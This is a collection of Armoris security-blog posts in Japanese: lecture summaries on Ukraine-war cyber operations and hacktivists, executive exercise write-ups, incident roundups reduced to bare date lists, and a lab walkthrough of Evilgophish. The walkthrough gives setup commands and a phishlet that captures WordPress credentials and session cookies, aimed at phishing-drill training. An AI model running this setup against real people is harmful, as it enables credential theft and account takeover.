現実世界がサイバー空間に与える影響――ウクライナ侵攻とハクティビストの動き

 こんにちは、Armoris 広報の酒井です。エストニアのサイバーセキュリティの権威で、Armorisの協力メンバーでもあるRain Ottis(レイン・オッティス)が、2023年12月、企業向けに講演。現実世界がサイバー空間に与える影響について、2023年11月11日時点の情報を語りました。今回は、ウクライナ侵攻におけるハクティビストの動きについて、Rainが語ったエッセンスを紹介します。(以下は、Rainによる講演内容の要約です)

レイン・オッティス(Rain Ottis)――タリン工科大学サイバーオペレーション学科教授で、以前は、NATO Cooperative Cyber Defence Centre of Excellenceとエストニア国防軍に勤務していました。

政府の指示で動く”ハクティビスト組織”が存在する理由

 前回は、ウクライナ侵攻に関連する2023年11月時点の最新のサイバー空間の動きについて解説しました。ウクライナ侵攻に関して、もう一つ注目すべきは、ハクティビストの動きです。というのも、現在観測されている複数の”ハクティビスト組織”は、本来の言葉どおり、政治的なイデオロギーを持った集団かどうか、必ずしも明確ではないからです。

 中には、ロシア政府から指示を受けている、もしくは、政府の一部である可能性が指摘されている組織も存在しています。また、ウクライナのIT軍(注:ウクライナ側の立場でサイバー攻撃を行っているとされている組織)は主に志願兵で構成されていますが、私の知る限り、ウクライナの指揮系統にある程度統合されており、ウクライナ政府から指示や支援を受けているようです。そのため、ハクティビストという言葉が引用符で囲まれているのです。

 無所属のハクティビストの多くは、やがて飽きて他のプロジェクトに移る傾向があります。そのため、政府の支援を受けた”ハクティビスト組織”が必要とされているのかもしれません。

ハクティビストがもたらす軍事的効果は?

 ”ハクティビスト組織”の攻撃のほとんどは、DDoS攻撃への参加やさまざまな種類の改ざんなど、比較的単純なものです。そして、何らかのデータにアクセスできるようになると、相手を困らせるためにそれらを公開し、情報漏えいさせようとします。しかし、戦闘作戦への直接的な影響は、あるとしてもわずかなようです。したがって、こうした活動のほとんどは、情報戦の一部と見なされるべきでしょう。

 ここ数か月の間に、これらの”ハクティビスト組織”が「何らかのルールに従って行動しようとしている」という報道がいくつかありました。これが実際に起こるかどうかを観察するのは興味深いでしょう。例えば、赤十字は、「ハクティビズムにおいて従うべきいくつかのルールを提案した」と報じられており、これには「病院を攻撃すべきではない」といった内容も含まれています。一部の組織は、「ルールを念頭に置くよう努める」と述べているとされていますが、遵守されるとは言い切れないでしょう。

 さて、日本企業が知るべきは、ウクライナへの支援を約束した、あるいは支援を提供した一部の国もサイバー攻撃の被害に遭っているということです。

 全体として、ロシア・ウクライナ戦争とその中のサイバー紛争に関する今回の最新情報を要約すると、(2023年11月時点においては)サイバー攻撃は多くの専門家が予測していたような形では実現していないということです。つまり、軍事的な効果はほとんどないと見ていいでしょう。したがって、この戦争におけるサイバー攻撃は主に「情報操作」と「(報道されることで)注目を集めたい」というレンズを通して見るべきだと私は思います。ただし、決して安全だと高をくくってはいけません。

 次回は、ガザで展開中のサイバー攻撃についてです。

Evilgophishの検証

このブログは、最近AWSと格闘しているアルバイトのseigo2016が書いています。 あるもりすぶろぐの内容は個人の意見です。


はじめに

検証には自身で管理する環境を使用し、自己責任でお願いします。また、この情報を悪用することは絶対に行わないでください。
今回は、フィッシングメールや、標的型攻撃メールの訓練に有用なソフトウェアである、Evilgophishの検証を行いました。

概要

Evilgophishは、中間者攻撃フレームワークのEvilginx3と、フィッシングツールキットのGophishを組み合わせたソフトウェアです。
Evilgophishを使うことで、ソーシャルエンジニアリングや標的型攻撃メールの訓練やテストを行うことができます。

Evilginxについて

Evilginxは、セッションCookieと共にログイン認証情報をフィッシングする中間者攻撃フレームワークです。 Go言語で独自のHTTP及びDNSサーバーが実装されています。

Gophishについて

Gophishは、ペネトレーションテスト等向けに設計された、オープンソース(MIT License)のフィッシングツールキットです。 こちらもGo言語で実装されています。

Evilgophishについて

Evilginx3をソーシャルエンジニアリングの検証や調査に用いるためには、別途個別の追跡情報を取得・確認する機能や、実際にメールやSMSなどに送信する方法を用意する必要があります。

このEvilgophishでは、Evilginx3とGophishを組み合わせることで、キャンペーンの統計情報の取得・確認やメール・SMSの送信などが可能であり、更にそれらの情報をWebブラウザから確認することができます。

検証

検証環境構成

すべての環境はVagrant上に構築し、それぞれにローカルのIPアドレスを付与しています。

  • Evilgophish実行環境
    • Ubuntu 22.04 (generic/ubuntu2204)
    • ホスト名 : example.test
  • メールサーバー実行環境
  • WordPressサーバー実行環境
    • Ubuntu 22.04 (generic/ubuntu2204)
    • WordPress (6.3.2)
    • ホスト名 : wp.test

Evilgophish環境構築手順

cloneとセットアップ

git clone https://github.com/fin3ss3g0d/evilgophish.git
sudo ./setup.sh example.test example.test true google.com true user_id false

Evilgophishの検証

Evilginxの起動・設定

cd evilginx3
./evilginx3 -g ../gophish/gophish.db -p legacy_phishlets/ --developer

-developerをつけることで、developer modeが有効になり、自己署名証明書が発行されます。 -pオプションでlegacy_phishlets/ディレクトリを指定することで、legacy_phishletsディレクトリ以下のphishletsが読み込まれます。 -gオプションで連携するgophishのデータベースを指定します。

検証のために用意したWordpress用のphishletを使用し、legacy_phishletsディレクトリ以下に配置しました。 このphishletは同じく株式会社ArmorisアルバイトのShaderoが以前の検証で利用したものを使わせてもらっています。

author: '@armoris'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: 'wp.test', session: true, is_landing: true}

sub_filters:
  - {triggers_on: 'wp.test', orig_sub: '', domain: 'wp.test', search: '{hostname}', replace: '{hostname}', mimes: ['text/html']}

auth_tokens:
  - domain: 'wp.test'
    keys: ['wordpress_logged_in_12913fd91550a6158ad37f2c7911fba9']
credentials:
  username:
    key: 'log'
    search: '(.*)'
    type: 'post'
  password:
    key: 'pwd'
    search: '(.*)'
    type: 'post'

login:
  domain: 'wp.test'
  path: '/wp-login.php'
config domain example.test
config ipv4 172.16.0.99
phishlets hostname wordpress example.test
phishlets enable wordpress
lures create wordpress
lures get-url 0

ここで表示されたフィッシングURLをgophish側で利用するため、保存しておきます。

gophishの起動・設定

今回は、gophishのダッシュボードにLAN内の別のマシンから接続するため、configのlisten_urlを書き換えています。

{
    "admin_server": {
        "listen_url": "0.0.0.0:3333",
        "use_tls": true,
        "cert_path": "gophish_admin.crt",
        "key_path": "gophish_admin.key"
    },
    "phish_server": {
        "listen_url": "0.0.0.0:8080",
        "use_tls": true,
        "cert_path": "gophish_template.crt",
        "key_path": "gophish_template.key"
    },
    "feed_enabled": true,
    "db_name": "sqlite3",
    "db_path": "gophish.db",
    "migrations_prefix": "db/db_",
    "contact_address": "",
    "logging": {
        "filename": "",
        "level": ""
    }
}
sudo ./gophish

起動に成功すると、初回ログイン用のユーザー名とパスワードが表示されます。 それを用いて、ブラウザからダッシュボードにログインします。

Email Templatesの作成

左側のメニューからEmail/SMS Templatesを選択し、New Templateボタンをクリックして、フィッシングメールのテンプレートを作成します。
本文内に{{.URL}}を設定することで、後で設定するEvilginxのフィッシングURLが挿入されます。

Email Sending Profilesの作成

左側のメニューからEmail/ Sending Profilesを選択し、フィッシングメールの送信に利用するSMTPサーバーの設定を行います。

Users & Groups の作成

左側のメニューからUsers & Groupsを選択し、New Groupから、フィッシングメールを送信するユーザーのグループを設定します。対象のユーザーの名前やメールアドレスを指定し、ユーザーを追加することができます。

Campaignsの作成

左側のメニューのLaunch Email Campaignからキャンペーンを作成します。
ここで、先程設定したEmail Template及びSending Profile、ユーザーグループを設定します。
また、evilginx URLの欄に、Evilginxで発行したPhishing URLを入力することで、先述のEmail Templatesの{{.URL}}の箇所にURLが挿入されます。

下部のProfitボタンをクリックすると、メールが送信されます。

今回はこのようなメールを送信しました。

キャンペーン状態の確認

送信後、ダッシュボードに戻ってくると、Email/SMS Sentが更新されています。 このように、グラフィカルにアクティブなキャンペーンの状態が確認できます。

また、画面下部のDetails欄に個別のメール送信先のStatusと取得した情報が表示されます。
受信したメールをユーザーがクリックすると、StatusがClicked Linkに更新され、クリックしたOS及びブラウザの情報と日時が表示されます。
その後、ユーザーがEvilginxで用意したフィッシングサイトにログインすると、Submitted DataCaptured Sessionのステータスが更新されます。

Details欄の該当ユーザーのタイムラインを見ると、用意したEvilginxのPhishletsでキャプチャするように指定した情報が取得できていることが確認できます。

Evilginx2と3の差異

セッショントークン関連

HTTP 応答パケットの本文や、Authorizationヘッダーなどからもセッショントークンを取得できるようになりました。

これまで、セッショントークンはHTTP Cookieとして送信される前提でしたが、最近ではJSONとして取得後、ローカルストレージに保存する流れも一般的であるためと説明されています。

config

configのファイルフォーマットがyamlからJSONに変更されました。一方で、phishletsはyamlのままです。

phishing sessions

有効なURLが開かれると、常にフィッシングセッションが作成されるようになりました。 これにより、ターゲットがURLを開く度にリバースプロキシセッションが新しく作成されます。

JavaScriptでのURLリダイレクト

これまでは、HTTP Locationヘッダーを通じてredirect_urlにリダイレクトしていました。しかし、この方法では、refererヘッダーを通じてフィッシングURLが宛先に公開されてしまっていました。今後はJavaScriptを用いてリダイレクトされます。

Evilgophishで攻撃された場合の検知方法

Gophishで送信したメールのX-MailerヘッダーにはIGNOREが設定されています。
X-Mailerヘッダーとは、送信者の使用したメールクライアントやそのバージョンなどが記載されたものです。
今のところ、このヘッダーの変更はOptionからは行えないようです。

今回送信したメールのヘッダー情報

最後に

今回はEvilginx2と3の比較と、Evilgophishの検証を行いました。
Evilginx3では、phishing sessions作成タイミングの変更やsession tokenを取得できる箇所の増加により、より柔軟に利用することができようになったと感じました。
また、Evilgophishを用いることで、メールテンプレートの作成や送信・統計情報の取得まで、ブラウザ上で容易に行うことができ、非常に有用であると思います。

「標的型攻撃による機密情報の窃取」は、IPAが公開している情報セキュリティ10大脅威 2023で、長年上位にランクインしています。Evilgophishを活用することで、標的型攻撃メール訓練の実施を簡単に行うことができます。

現実世界がサイバー空間に与える影響――ウクライナ侵攻とサイバー攻撃

 こんにちは、Armoris 広報の酒井です。エストニアのサイバーセキュリティの権威で、Armorisの協力メンバーでもあるRain Ottis(レイン・オッティス)が、2023年12月、企業向けに講演し、現実世界がサイバー空間に与える影響と2023年のサイバー紛争について、2023年11月11日時点の情報を語りました。今回は、ロシアによるウクライナ侵攻とサイバー攻撃について、ウクライナレジリエンスを高める契機となったインシデント、ロシアによるものとされるサイバー攻撃のあらましなど、Rainが語ったエッセンスを紹介します。(以下は、Rainによる講演内容の要約です)

レイン・オッティス(Rain Ottis)――タリン工科大学サイバーオペレーション学科教授で、以前は、NATO Cooperative Cyber Defence Centre of Excellenceとエストニア国防軍に勤務していました。

ウクライナ侵攻前からあった、ロシアによるサイバー攻撃

 2022年2月24日に始まったロシアによるウクライナ侵攻。しかし、実際には2014年のクリミア併合以来、両国は緊張状態が続いていました。

 例えば、2015年12月、ウクライナの電力網に対するロシアによるものとされる攻撃。首都キーウなどで大規模停電が発生し、約22.5万人に影響を与えました(この事件は、重要インフラへのサイバー攻撃によって停電が発生した世界初の事例だと言われています)。

 これは複雑で多層的なサイバー事件で、送電網へのアクセスを目的としたフィッシングやマルウェアの使用が含まれていました。OT用のハードウェアのファームウェアが侵害され、制御を取り戻すには、変電所を一カ所ずつ回って物理的に送電経路を切り替える必要がありました。さらに、電力会社のコールセンター機能を麻痺させる「TDoS(Telephony Denial of Service)攻撃」や、データを消去するためにマルウェア「KillDisk」が使用されるなど、ウクライナの復旧をより困難なものにしました。冬のウクライナの平均最低気温はマイナス4度。私の知る限り、この事件で命を落とした人はいなかったようですが、その可能性は大いにありました。

 もう一つ、非常によく知られたサイバー攻撃は、2017年の「NotPetya(ノットペトヤ)」と呼ばれるもので、会計ソフト「MEDoc」のソフトウェア更新の仕組みが悪用されました。当時としては比較的高度なマルウェアで、ウクライナの企業や団体に拡散されました。

地上より前に始まっていたサイバー空間の動き

 地上での侵攻が始まる直前の2022年1月から2月にかけては、サイバー空間で、これに関係するとみられる多くの事件が発生しました。つまり、地上より先にサイバー空間で動きが始まっていたのです。

 具体的には、ウェブサイトの改ざん、DDoS攻撃、ワイパー・ランサムウェアや他のタイプのマルウェアが非常に広範にわたって使用されました。再びウクライナの電力網を標的にした「Industroyer2」というマルウェアの使用も確認されましたが、幸い、この電力網への攻撃は早期に検知され、影響はありませんでした。

 しかし、2月24日の地上での侵攻が始まって1時間後、通信衛星ユーテルサット」を保有する通信衛星「KA-SAT」の地上局に攻撃があり、ウクライナだけでなく他の地域でも多くのシステムと組織がインターネット接続を失いました。ほとんど単なる迷惑行為で復旧可能なものでしたが、この状況で最初の数時間のうちに通信を失うことは壊滅的な影響を与える可能性がありました。ただ幸いなことに、ウクライナには代替の通信手段があり、防衛に致命的な影響はありませんでした。

影響し合う現実世界とサイバー空間

 サイバー空間の動きは、他の領域にも影響を及ぼしています。その一つがインフラを巡る争いです。要は、ケーブル、ルーター、アンテナなど、インターネットの物理インフラを制御する国が、この戦いでは明らかに有利なのです。第二に、電磁波の周波数帯の支配をめぐって非常に重大な対立が発生しました。これは主に電子戦の分野の問題ですが、周波数帯をコントロールできれば、通常では不可能なサイバー攻撃を起こせる可能性があります。また、経済制裁は明らかにロシアの戦争遂行に悪影響を与えました。国外からの輸入が規制されたことで、ハードウェアとソフトウェアの調達が制限されたのです。

 2022年から2023年にかけては何が変わったのでしょうか。注目すべき点は、多くの専門家の予想に反し、実際には大きな損害を与えるサイバー攻撃がほとんど発生していないことです。試みや攻撃の主張がなかったわけではありません。むしろさまざまな攻撃者が参加していますが、大きな被害は確認されていません。

ロシアによる標的型攻撃 法執行機関やメディア、エネルギー関連も標的に 

 ここからは、ロシアのAPT(標的型攻撃)のレベルに関してです。ここで紹介するのは、政府の情報機関がスポンサードする脅威グループのことで、2023年の主な標的は、ウクライナの法執行機関だったとみていいでしょう。

 彼らは戦争犯罪の証拠収集を妨害する試みに関係していると思われます。つまり、ロシア側は、ウクライナの法執行機関が後にロシアに対して裁判で使用する可能性のある証拠の収集を阻止しようと考えているとみられます。また、ウクライナのメディア企業に対するサイバー攻撃も観測されています。私はこれを大規模な情報キャンペーンの一環とみています。メディアへの攻撃は比較的単純です。DDoS攻撃を使用して、Webサイトをダウンさせるか、マルウェアを用いてシステムを内部から破壊するかです。

 最後に、ロシア側はエネルギーに関しても諦めていません。彼らはそこで足場を築き、エネルギーシステムを操作しようとしていますが、私の知る限り、今のところ大きな成功はありません。使用されている方法は比較的よく知られているもので、組織やシステムにアクセスするために、さまざまなフィッシングが行われています。

サイバー攻撃は何度も繰り返される 日本企業も警戒を

 ランサムウェアを含むマルウェアは非常に広範囲に使用されています。新しいものが次々導入され、情報戦の一部として使用されています。攻撃者が何らかのデータにアクセスできるようになると、データを漏えいさせようとします。重要なのは、こうした攻撃が一度や二度ではなく、何度も繰り返されているということです。

 日本の民間企業にとっても決して対岸の火事ではありません。つまり、攻撃されたことが分かり、システムをクリーンアップしたとしても、安全とは言えないわけです。攻撃者はあなたのシステムをある程度知っているため、何度も攻撃を試みるでしょう。そして、あなたの会社は攻撃を繰り返しやすい”簡単なターゲット”とみなされます。

 今回はここまで。次回は、ハクティビストの動きについてRainが語った内容をご紹介します。

特定期間に発生したインシデントとその報道されたニュースとかのリンクをまとめたもの17

このブログは別の場所でSOCにも携わっている経験のある株式会社Armorisのseanが、本人の興味範囲に基づいて収集したサイバーセキュリティ関連の出来事をまとめたものです。 各出来事に関するコメントは個人の意見です。

サイバー世界情勢

地域的なサイバーセキュリティの話題。サイバー攻撃の話題の場合は、攻撃を受けた側の地域別に分類。地域分けが間違っていたらご容赦ください。

今月は前月から引き続きヨーロッパと中東の記事が多いですね。

アジア

11/7

11/8

11/13

11/21

11/22

11/24

11/28

北米

11/7

11/22

ヨーロッパ

11/7

 

11/16

11/17

11/28

中東

11/7

 

11/8

 

11/10

11/15

11/20

11/28

11/29

11/30

オセアニア

11/7

11/13

アフリカ

11/29

脆弱性関連

数が多いので気になったものだけをまとめます。

11/8

11/15

 

11/16

11/28

11/29

11/30

分析手法、ツール関連

11/7

11/9

 

11/14

11/20

解析・分析・研究記事

マルウェア

11/14

11/22

フィッシング

11/8

11/10

11/15

11/20

APT

11/21

 

ランサムウェア

11/7

11/10

11/14

 

11/15

11/21

11/24

悪意あるパッケージ

11/14

Botnet

11/7

11/15

11/30

Bot

11/7

DDoS

11/9

 

マルバダイジング

11/10

11/13

インフォスティーラー

11/7

11/15

ドロッパー

11/7

マイナー

11/9

Webスクレイピング

11/9

11/13

ワイパー

11/14

USBワーム

11/20

ダークウェブ

11/9

11/21

ドメインハイジャック

11/7

SSRF

リポジトリ侵害

11/9

11/20

イニシャル・アクセス

11/15

ソーシャルエンジニアリング

11/14

11/24

スミッシング

11/14

フェイク・アップデート

11/15

Web Shell

11/24

Windows

QRコード不正

最近よく見るのでまとめます。

11/14

11/13公表

10/30公表

11/9公表

レポート・まとめ

11/7

 

 

 

11/8

 

11/9

11/10

 

 

11/13

 

11/15

 

11/17

 

11/28

11/30

 

テイクダウン・逮捕

11/15

11/29

官公庁・組織・団体公表

CISANSA

11/29

FDA

11/22

経済産業省

11/28

IPA

11/10

 

JPCERT/CC

11/13

OT

11/10

11/15

11/16

システム・セキュリティ業界の動向

AWS

11/15

Discord

11/7

攻撃側の動向ほか

11/8

11/15

11/20

11/21

Lockbit関係

11/15

11/29

 

BlackCat(ALPHV)

11/17

業界別インシデント

医療系は変わらず記事が多い印象です。まとめ方の問題かもしれませんが、小売業関係、公的機関関係が増えているように思います。

金融・証券・保険・ローン

11/7

 

11/9

 

11/10

11/20

暗号資産

11/22

製造

11/10

11/15

11/20

11/29

 

自動車関連

11/7

11/22

情報

11/7

11/8

11/17

11/22

11/24

11/28

通信

11/7

11/17

11/22

教育

11/7

11/24

医療・医薬・ヘルス

11/7

11/9

11/13

 

11/16

11/21

11/22

11/28

小売、卸売

11/7

 

 

11/9

11/15

11/24

電気機器

11/7

エネルギー

11/29

官公庁・公的機関

11/10

11/13

11/16

11/17

11/20

11/21

11/24

11/28

研究機関

11/24

国立研究開発法人

11/30

独立行政法人

11/24

運輸

11/9

11/16

11/17

航空

11/7

建設

11/29

宿泊

11/8

娯楽

11/16

AI関連

11/9

啓蒙・教育・人材関連

11/7

 

11/9

11/16

気になった記事

11/7

11/8

 

11/17

11/22

11/29

経営層向けサイバーセキュリティ演習について(その2)

 今回のブログ記事では、前回に引き続き、経営層向けサイバーセキュリティ演習の進め方について、準備からシナリオの検討まで、ステップごとに紹介します。  サイバーセキュリティ演習に取り組んでいる方の参考になれば幸いです。

演習の目的から逆算したサイバー攻撃のシナリオ検討

 演習の主要な参加者はA社の経営幹部であり、彼らが主体的に判断せざるをえない危機的な事態を想定することになります。  その前提として、「A社の最重要アセットは何か」を考える必要があるのです。通常、サイバーセキュリティリスクを考える上で、その組織が持つ「資産」と資産がもつ「脆弱性」、さらに資産に対する「脅威」を評価し、リスクが顕在化したときにどのような影響が発生するか、を考えるプロセスがあります。

 ここでいう資産には、単に保有している情報やITシステムのみならず、自社の保有する業務プロセスや販売ルート、自社製品のマーケットシェアなども含めて幅広く考える必要があります。

 今回の演習では、機微な個人情報を大量に取り扱っているというA社の業種特性を踏まえ、機密性と完全性を侵害するシナリオを作成しました。これが最もA社に与えるダメージが大きいと考えられるからです。

演習をリアルに近づけるために

 演習とはいっても、荒唐無稽な架空の設定では、課題発見といった十分な効果が得られません。システム面でのリアリティもとても重要です。そのため、演習事務局として、今回の演習範囲の業務を良く知る方に協力メンバーとして加わってもらい、ヒアリングやシステム設計に関するブリーフィング等を通じて、リスクの洗い出しを行いました。そうすることで、ある事象が発生した際の参加者の動きを予め想定でき、より参加者が困難な判断を迫られる状況を作り出すことができます。

 また、前回の記事で触れたような演習オペレータによる内外関係者役を配置することで、業務面においてもリアリティを向上させることができます。

 サイバーセキュリティ演習といっても、単純にシステム面のことだけわかっていればよいというものではなく、演習対象となる組織の全体像をよく把握することが重要となるでしょう。

演習の準備などについて

 おそらくこのブログをご覧になっている皆さんが一番気になるのは、このプロジェクトの実施にあたってどの程度のリソースを費やしたかという点だと思います。詳細は明らかにはできませんが、本プロジェクトにおいては、総プロジェクト期間6か月程度を要した、それなりに大規模なプロジェクトとなりました。

 こうした大規模なプロジェクトを円滑に進めるためには、社内のコンセンサスが絶対不可欠です。実際、今回のプロジェクトでは、A社のサイバーセキュリティ責任者の役員の方のコンセンサスのもと、サイバーセキュリティ部門が主体的にプロジェクトを企画・運営し、そこに事業部門の協力メンバーも加わって検討が進められました。(ArmorisはプロジェクトPMOや技術面を中心として、演習当日の運営や演習シナリオの構成に関する助言、支援を行いました)

 こうした組織全体を巻き込んだ環境整備により、社内の関係者の協力を十分に得ることができたため、実施に向けた準備をスムースに進めることができたと言えます。

どんな組織におすすめ?

 さて、こうしたサイバー演習については、どんな組織が行うべき取組みでしょうか。先述のとおり、演習とは、総合的な能力の向上、学びや気づきを得ること、特定のプロセスの検証と改善、などを目的に実施するものであることから、演習を行うべき対象はある意味では全ての組織に該当するといえるでしょう。

 しかしながら、そうはいってもなかなかイメージしにくい、経営層まで巻き込んでできるものか・・と躊躇してしまうこともあると思います。そこで、我々としては、できる範囲で少しずつ広げていくという、スモールスタート方式をおススメしています。

 例えば、そもそもサイバーセキュリティに関して大幅に知識や要員が不足しているという状況であれば、まずはセキュリティ部門を対象とした小規模な演習を実施する、次に、セキュリティ部門とある特定の事業部門の現場レベルを対象とした演習を実施する・・・というような進め方が考えられます。もしくは、既に経営者・役員レベルでサイバーセキュリティの重要性のコンセンサスが得られているが、具体的なアクションにはつながっていないという状況であれば、いきなり経営レベルを対象とした演習を実施することで、課題の優先順位を設定する契機になるかもしれません。

 いずれにしても、演習は自組織のセキュリティを向上させていくための一方策であって、それ自体は目的ではないので、演習からどのようなことを得たいのか、から逆算すると良いと思います。

最後に

 Armorisが提供する経営層演習支援サービスについては、以下のウェブサイトでもご紹介していますので、良かったらご覧ください。 【経営層向けサイバーセキュリティ演習支援サービス】 https://www.armoris.jp/top/service/group/exercise-executive

 また、経営層演習以外の演習系のプログラムについては、別の記事でまとめたいと思います。

経営層向けサイバーセキュリティ演習について(その1)

Armorisでいろんな案件にたずさわる川崎(筆者)です。

 2023年11月中旬、日本を代表する、とある大企業(以下、A社)において、経営層を対象としたサイバーセキュリティ演習プロジェクトが実施されました。本プロジェクトは、A社サイバーセキュリティ部門と特定のサービスを提供する事業部門が中心となって進められ、企画・運営を行う中で、弊社CTO鎌田&CXO竹田及び筆者などがプロジェクト運営をサポートする形で進められました。

 サポートメンバーには以前このブログでも紹介したレイン・オッティス(Rain Ottis)や、ヤーン・プリッサル(Jaan Priisalu)なども参加。欧州のサイバーセキュリティ視点も盛り込んだプロジェクトとなりました。

 ここでは、本件プロジェクトを通じて得られた重要なポイントを2回に分けてまとめます。

どんなことをしたの?

 A社の特定の事業領域において、当該事業の継続に重大な影響を与えるサイバーインシデントの発生を想定した机上演習方式で実施しました。演習には、A社のサイバーセキュリティ担当役員や広報責任者、サイバーセキュリティ部門、当該事業部門の幹部らが参加しました。

 参加者は会議室に集合及びオンラインでウェブ会議システムに接続した上で、次々と提示されるInjection(今どのような状況にあるかを示した情報)に対して様々なアクションを行う方式で進められました。

 演習はできる限り実際の現場を想定した構成となっており、そのため演習参加者以外の関係者ー例えば顧客や社内の他部門、外部の関係者などとコミュニケーションをとらなくてはならない場面になることもあります。そうした時には、演習のオペレータ(事務局)が内外の関係者役を演じて参加者からのコミュニケーションに応じることで、実際の状況に類似した舞台を演出することができます。これによって、参加者はよりリアルなインシデント対応を検討・実施することができるでしょう。

 なお、演習プログラムは午後イチから夕方まで、半日程度のプログラムとなりました。

何のためにやるの?

 今回の演習では、地理的に離れたA社のサイバーセキュリティ部門や広報部門などの管理部門と、実際の事業部門が適切に連携してインシデント対応を行うことができるのか、に主眼を当てたプログラムとなりました。

 当然、参加者は経営層ですので、生半可なレベルではなく、多くの顧客への対応やそれに伴う多額の損害、またマスコミ報道によるレピュテーションリスクへの影響などを加味した重大なインシデントの発生を想定しました。詳細は伏せますが、例えば、数十万人の個人情報、それも住所氏名メールアドレスにとどまらず、より機微な個人情報が侵害を受けてしまったというような重大インシデントを想定した演習となりました。

どんなことが得られた?

 ここで少し定義の話となりますが、「演習」とは英語では”Exercise”と翻訳される語であり、総合的な能力の向上、学びや気づきを得ること、特定のプロセスの検証と改善、などを目的に実施するものです。したがって、上手にできたかどうかよりも、どんな課題が見つかったかを重視する性質のプログラムと言えるでしょう。つまり、どんどんつまずいて、失敗したほうがいいのです。

 ちなみに、これとよく似た用語で「訓練」ということばがあります。これは英語では”Drill”と翻訳され、ある手順や対処方法における習熟度の向上に重点を置いたものです。例えば避難訓練などは災害発生時に適切なルートで避難することを目的に行うことから、できるだけ手順を遵守して上手にできたかどうかが重要となります。

 さて、演習参加者からは、セキュリティ対策の実装面といった技術的な事項のみならず、コミュニケーションの方法や段取り、集約すべき情報の性質や情報共有のスピード、内外関係者との連携など、組織的な側面においても多岐にわたって向上を図るべき課題があるとの認識に至ったとのコメントがありました。

 演習においてより重要なのは、こうした課題を認識しただけで終わらず、これらの課題を改善した上で、また新たに演習を行って課題発見→改善する・・・といったサイクルを継続的に行うことです。

 また、その際、見つかった課題の全てを改善できればそれがもっとも望ましいことですが、通常はさまざまなリソース上の制約があることから、一度にすべてが抜本的に改善できるケースは稀(まれ)でしょう。そのため、見つかった課題に対して改善すべき優先順位を設定して対処するという現実的な考え方も忘れてはいけません。

参加者の対応状況からA社の課題を分析しているCTOの鎌田

どんな風に進めたの?

 恐らくこのブログをご覧いただいている方の中には、自らの組織でもサイバーセキュリティ演習に取り組んだ経験のある方や、あるいはこれから取組みを始めてみたい、と思っている方もいらっしゃると思います。次回は、どのようにこのプロジェクトを進行したのか、準備段階から具体的にご紹介したいと思います。

特定期間に発生したインシデントとその報道されたニュースとかのリンクをまとめたもの16

このブログは別の場所でSOCにも携わっている経験のある株式会社Armorisのseanが、本人の興味範囲に基づいて収集したサイバーセキュリティ関連の出来事をまとめたものです。 各出来事に関するコメントは個人の意見です。

サイバー世界情勢

地域的なサイバーセキュリティの話題。サイバー攻撃の話題の場合は、攻撃を受けた側の地域別に分類。地域分けが間違っていたらご容赦ください。

アジア

10/2

10/4

10/5

10/6

10/10

10/13

10/19

10/20

北米

10/10

10/13

ヨーロッパ

10/2

10/18

10/20

中東

10/10

10/11

10/18

10/20

オセアニア

アフリカ

10/13

10/5

脆弱性関連

10/2

10/4

10/6

10/12

10/13

10/18

10/19

10/20

分析手法、ツール関連

10/4

解析・分析・研究記事

10/2

10/3

10/4

10/12

10/13

10/20

マルウェア

10/3

10/5

10/10

10/13

10/19

フィッシング

10/2

10/4

10/20

APT

10/2

10/6

ランサムウェア

複数のランサムウェアを使う攻撃が出てきているようですね。

10/2

10/3

10/4

10/5

10/6

10/10

10/19

10/20

悪意あるNPMパッケージ

10/6

Botnet

10/5

10/10

10/12

10/13

DDoS

HTTP/2Rapid Resetの影響で記事が増えましたね。

10/3

10/5

10/11

マルバダイジング

オープンリダイレクト

RAT

10/6

インフォスティーラー

10/19

ダークウェブ

10/10

10/18

イーサハイディング

10/18

テイクダウン

レポート・まとめ

10/3

10/10

  • 「破産手続き開始」企業サイトの“改ざん被害”各地で相次ぐ 背景に「恒心教」の可能性も…実在する弁護士の名前が記載

10/13

10/18

10/19

  • IT admins are just as culpable for weak password use

10/20

官公庁・組織・団体公表

CISA

10/20

NSA and CISA

NISC

10/2

警察庁

10/2

システム・セキュリティ業界の動向

Google(Android)

10/4

10/18

Microsoft

10/11

Python

10/5

業界別インシデント

可能な限り業種を調べて分類していますが、間違い等ありましたらご容赦ください。

金融・保険

10/3

10/10

暗号資産

10/18

製造

10/12

情報

10/3

10/6

通信

10/6

教育

教育業界は記事が多いですね。カシオ計算機株式会社のインシデントの影響が出ているようです。

10/3

10/12

  • 「MHJストア」への不正アクセスによる個人情報漏えいに関するお詫びとお知らせ(株式会社マウンハーフジャパン)

10/20

医療・医薬・ヘルス

10/10

小売、卸売

10/13

電気機器

10/5

10/6

10/10

10/19

出版

10/10

ゲーム

10/20

10/13

エネルギー

10/19

官公庁・公的機関

10/10

協会

10/2

独立行政法人

運輸

10/5

10/11

10/12

宿泊

Booking.comのインシデント影響が続いていますね。

10/3

10/10

非営利団体関連

10/4

不明

業種がわからなかった企業を記事をここにまとめます。

10/13

AI関連

10/13

啓蒙・教育・人材関連

10/4

気になった記事

10/6

10/10

10/11

10/18

10/20